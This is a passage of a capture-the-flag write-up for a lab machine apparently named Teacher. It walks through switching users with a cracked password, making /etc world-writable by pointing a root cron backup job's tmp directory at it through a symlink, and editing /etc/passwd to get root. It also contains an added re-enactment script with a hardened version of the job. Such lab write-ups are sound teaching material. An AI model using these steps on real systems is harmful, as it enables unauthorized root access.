Started: Mon Feb 17 14:04:09 2020
Stopped: Mon Feb 17 14:04:15 2020
The password (expelled) is cracked almost instantly, and the backup account's password also works for giovanni.
User flag
www-data@teacher:/var/www/html/moodle$ su - giovanni
Password: expelled
giovanni@teacher:~$ whoami
giovanni
giovanni@teacher:~$ cat user.txt
<USER_FLAG>
Privilege escalation
As giovanni we can access the folder /home/giovanni/work that the root cron job works in.
giovanni@teacher:~/work$ cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
The script is simple, and it trusts two directories that we own. We could, for example, replace /home/giovanni/work/courses with a symlink to /root: tar would archive the contents of /root (including root.txt) into the backup and chmod 777 would make the extracted copy readable, which gives us the flag but not control of the machine. A better strategy is to replace /home/giovanni/work/tmp with a symlink to /etc: the script then changes into /etc, extracts the archive there and runs chmod 777 * -R, giving every user write access to files such as /etc/passwd and /etc/shadow.
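To see exactly what the symlink buys us, and what a safe version of the job looks like, here is an added example that is not part of the original write-up. It re-enacts backup.sh as an ordinary user inside a throwaway directory standing in for /home/giovanni/work and /etc (the sample course file and passwd line are constructed), so no root privileges and no real cron job are needed, and it puts a hardened variant of the script beside the vulnerable one.

```shell
#!/bin/sh
# Added example, not part of the original write-up: a local re-enactment of
# the backup.sh symlink abuse plus a hardened variant of the script.
# It runs as an ordinary user inside a throwaway directory that stands in for
# /home/giovanni/work and /etc, so nothing on the real system is touched.

# vulnerable_backup WORKDIR
# The four commands of /usr/bin/backup.sh with the hard-coded path taken as an
# argument. "chmod -R 777 *" is the original "chmod 777 * -R" written with the
# option first; GNU chmod treats both the same.
vulnerable_backup() {
    cd "$1" || return 1
    tar -czf tmp/backup_courses.tar.gz courses/* || return 1
    cd tmp || return 1                 # silently follows the symlink if tmp is one
    tar -xf backup_courses.tar.gz || return 1
    chmod -R 777 *
}

# hardened_backup WORKDIR
# Refuses to run if tmp or courses has been replaced by a symbolic link,
# extracts into a freshly created private directory, and never grants
# world-writable permissions. The -L test only closes the simple case shown in
# the write-up (it can still be raced); a root job should not work inside a
# user-writable tree at all.
hardened_backup() {
    cd "$1" || return 1
    if [ -L tmp ] || [ -L courses ]; then
        echo "refusing: tmp or courses is a symlink" >&2
        return 2
    fi
    tar -czf tmp/backup_courses.tar.gz courses || return 1
    out=$(mktemp -d "$1/tmp/restore.XXXXXX") || return 1
    tar -xf tmp/backup_courses.tar.gz -C "$out" || return 1
    chmod -R u+rwX,go-w "$out"
    printf '%s\n' "$out"
}

# demo
# Builds the layout from the write-up with constructed sample data, plants the
# tmp -> etc symlink, runs both scripts and prints four values:
#   mode of etc/passwd after the vulnerable run (777 = world-writable),
#   exit code of the hardened script while the symlink is in place,
#   mode of etc/passwd after the hardened run,
#   exit code of the hardened script once the real tmp is restored.
demo() {
    base=$(mktemp -d) || return 1
    mkdir -p "$base/etc" "$base/work/courses/algebra" "$base/work/tmp"
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$base/etc/passwd"   # constructed
    chmod 644 "$base/etc/passwd"
    printf 'lesson 1\n' > "$base/work/courses/algebra/lesson1.txt"     # constructed

    # Attacker step from the write-up: swap the real tmp for a link to /etc.
    mv "$base/work/tmp" "$base/work/tmp.old"
    ln -s "$base/etc" "$base/work/tmp"

    (vulnerable_backup "$base/work") >/dev/null 2>&1 || true
    vuln_mode=$(stat -c %a "$base/etc/passwd")

    chmod 644 "$base/etc/passwd"
    (hardened_backup "$base/work") >/dev/null 2>&1 && hard_rc=0 || hard_rc=$?
    hard_mode=$(stat -c %a "$base/etc/passwd")

    # Put the real tmp back, as the write-up does, and confirm the hardened
    # script still performs the backup.
    rm "$base/work/tmp"
    mv "$base/work/tmp.old" "$base/work/tmp"
    (hardened_backup "$base/work") >/dev/null 2>&1 && ok_rc=0 || ok_rc=$?

    rm -rf "$base"
    printf '%s %s %s %s\n' "$vuln_mode" "$hard_rc" "$hard_mode" "$ok_rc"
}

# Uncomment to run the re-enactment (expected output: 777 2 644 0):
# demo
```

The run shows the whole bug in one line of output: after the vulnerable script the stand-in /etc/passwd is mode 777, while the hardened script refuses to touch the symlinked directory and leaves the file at 644, yet still completes once tmp is a real directory again.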
giovanni@teacher:~/work$ ls -ltr
total 8
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 tmp
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 courses
giovanni@teacher:~/work$ mv tmp tmp.old
giovanni@teacher:~/work$ ln -s /etc tmp
giovanni@teacher:~/work$ ls -la
total 16
drwxr-xr-x 4 giovanni giovanni 4096 Feb 17 20:24 .
drwxr-x--- 4 giovanni giovanni 4096 Nov 4 2018 ..
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 courses
lrwxrwxrwx 1 giovanni giovanni 4 Feb 17 20:24 tmp -> /etc
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 tmp.old
At the next run of the cron job pspy shows the script working inside /etc:
2020/02/17 20:26:01 CMD: UID=0 PID=1958 | tar -czvf tmp/backup_courses.tar.gz courses/algebra
2020/02/17 20:26:01 CMD: UID=0 PID=1959 | gzip
2020/02/17 20:26:01 CMD: UID=0 PID=1960 | /bin/bash /usr/bin/backup.sh
2020/02/17 20:26:01 CMD: UID=0 PID=1961 | tar -xf backup_courses.tar.gz
2020/02/17 20:26:01 CMD: UID=0 PID=1962 | "chmod 777 adduser.conf adjtime alternatives analog.cfg apache2 apm apparmor.d apt backup_courses.tar.gz bash.bashrc bash_completion bash_completion.d bindresvport.blacklist binfmt.d ca-certificates ca-certificates.conf ca-certificates.conf.dpkg-old calendar console-setup courses cron.d cron.daily cron.hourly cron.monthly crontab cron.weekly dbconfig-common dbus-1 debconf.conf debian_version default deluser.conf dhcp dictionaries-common discover.conf.d discover-modprobe.conf dpkg emacs environment fail2ban fonts fstab fuse.conf gai.conf groff group group- grub.d gshadow gshadow- gss hdparm.conf host.conf hostname hosts hosts.allow hosts.deny init init.d initramfs-tools inputrc insserv.conf.d iproute2 issue issue.net kernel kernel-img.conf ldap ld.so.cache ld.so.conf ld.so.conf.d libaudit.conf lighttpd locale.alias locale.gen localtime logcheck login.defs logrotate.conf logrotate.d machine-id magic magic.mime mailcap mailcap.order manpath.config mime.types mke2fs.conf modprobe.d modules modules-load.d monit motd mtab mysql nanorc network networks newt nsswitch.conf opt os-release pam.conf pam.d passwd passwd- perl php phpmyadmin profile profile.d protocols python python2.7 python3 python3.5 rc0.d rc1.d rc2.d rc3.d rc4.d rc5.d rc6.d rcS.d reportbug.conf resolv.conf rmt rpc rsyslog.conf rsyslog.d securetty security selinux services sgml shadow shadow- shells skel ssh ssl staff-group-for-usr-local subgid subgid- subuid subuid- sysctl.conf sysctl.d systemd terminfo timezone tmpfiles.d ucf.conf udev ufw update-motd.d vim vmware-tools wgetrc X11 xdg xml -R
2020/02/17 20:26:14 CMD: UID=0 PID=1963 |
The /etc directory is now world-writable. We revert the symlink so that the cron job goes back to doing its original task:
giovanni@teacher:~/work$ rm tmp
giovanni@teacher:~/work$ mv tmp.old tmp
giovanni@teacher:~/work$ cd /etc
giovanni@teacher:/etc$ ls -l passwd
-rwxrwxrwx 1 root root 1450 Jun 27 2018 passwd
Since /etc/passwd is writable, we can set giovanni's uid and gid to 0:
giovanni@teacher:~/work$ cat /etc/passwd | grep giovanni
giovanni:x:1000:1000:Giovanni,1337,,:/home/giovanni:/bin/bash
giovanni@teacher:~$ sed 's/giovanni:x:1000:1000:Giovanni,1337,,:\/home\/giovanni:\/bin\/bash/giovanni:x:0:0:Giovanni,1337,,:\/home\/giovanni:\/bin\/bash/' /etc/passwd > /tmp/passwd
giovanni@teacher:~$ cp /tmp/passwd /etc/passwd
giovanni@teacher:~$ cat /etc/passwd | grep giovanni
giovanni:x:0:0:Giovanni,1337,,:/home/giovanni:/bin/bash
Root flag
giovanni@teacher:~$ exit
logout
www-data@teacher:/var/www/html/moodle/question$ su - giovanni
Password: expelled
root@teacher:~# whoami
root
root@teacher:~# cat /root/root.txt
<ROOT_FLAG>
Daniel Simao 20:28, 16 February 2020 (EST)